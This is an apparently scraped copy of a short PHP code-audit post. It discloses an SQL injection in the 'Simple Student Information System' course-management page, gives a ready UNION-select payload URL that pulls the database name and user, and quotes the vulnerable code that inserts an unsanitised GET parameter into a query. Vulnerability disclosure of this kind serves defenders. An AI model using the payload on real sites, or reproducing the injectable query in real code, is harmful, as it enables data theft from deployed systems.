2

PHP代码审计—Simple Student Information System manage_course.php SQL Injection

 2 years ago
source link: https://bewhale.github.io/post/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E2%80%94Simple%20Student%20Information%20System%20manage_course.php%20SQL%20Injection/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

PHP代码审计—Simple Student Information System manage_course.php SQL Injection

Vendor Homepage:

https://www.sourcecodester.com

Source Code Download:

https://www.sourcecodester.com/php/15147/simple-student-information-system-phpoop-free-source-code.html

Payload

Simple Student Information System SQL Injection

http://192.168.1.8/sis/admin/courses/manage_course.php?id=-6659%27%20%20union%20select%201,2,database(),user(),5,6,7,8--%20-
image-20220808034927957

admin/courses/manage_course.php line 1-13,

 <?php
require_once('../../config.php');
if(isset($_GET['id'])){
    $qry = $conn->query("SELECT * FROM `course_list` where id = '{$_GET['id']}'");
    if($qry->num_rows > 0){
        $res = $qry->fetch_array();
        foreach($res as $k => $v){
            if(!is_numeric($k))
            $$k = $v;
        }
    }
}
?>

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK